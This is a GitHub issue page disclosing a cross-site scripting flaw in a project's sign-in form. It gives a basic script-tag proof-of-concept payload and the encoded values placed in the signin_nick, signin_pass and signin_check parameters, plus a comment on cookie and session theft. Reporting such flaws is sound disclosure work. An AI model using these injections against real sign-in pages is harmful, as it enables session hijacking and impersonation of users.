Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is one xss vulnerability #846

Open
flowertimes opened this issue Jun 9, 2023 · 1 comment
Open

There is one xss vulnerability #846

flowertimes opened this issue Jun 9, 2023 · 1 comment

Comments

@flowertimes
Copy link

There is one xss vulnerability

poc

"'><script>alert([VARIANT ID])</script>

The following changes have been applied to the original request:
The value of parameter 'signin_nick' has been set to '% 3E% 22% 27% 3E% 3Cscript% 3Early% 2869% 29% 3C% 2Fscript% 3E'
The value of parameter 'signin_pass' has been set to'% 3E% 22% 27% 3E% 3Cscript% 3Early% 2869% 29% 3C% 2Fscript% 3E '
The value of parameter 'signin_check' has been set to '% 3E% 22% 27% 3E% 3Cscript% 3Early% 2869% 29% 3C% 2Fscript% 3E'
微信截图_20230609164701
微信截图_20230609164732
@flowertimes
Copy link
Author

There is a XSS vulnerability .May steal or manipulate customer sessions and cookies, which may be used to impersonate legitimate users, allowing hackers to view or change user records and execute transactions as that user.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@flowertimes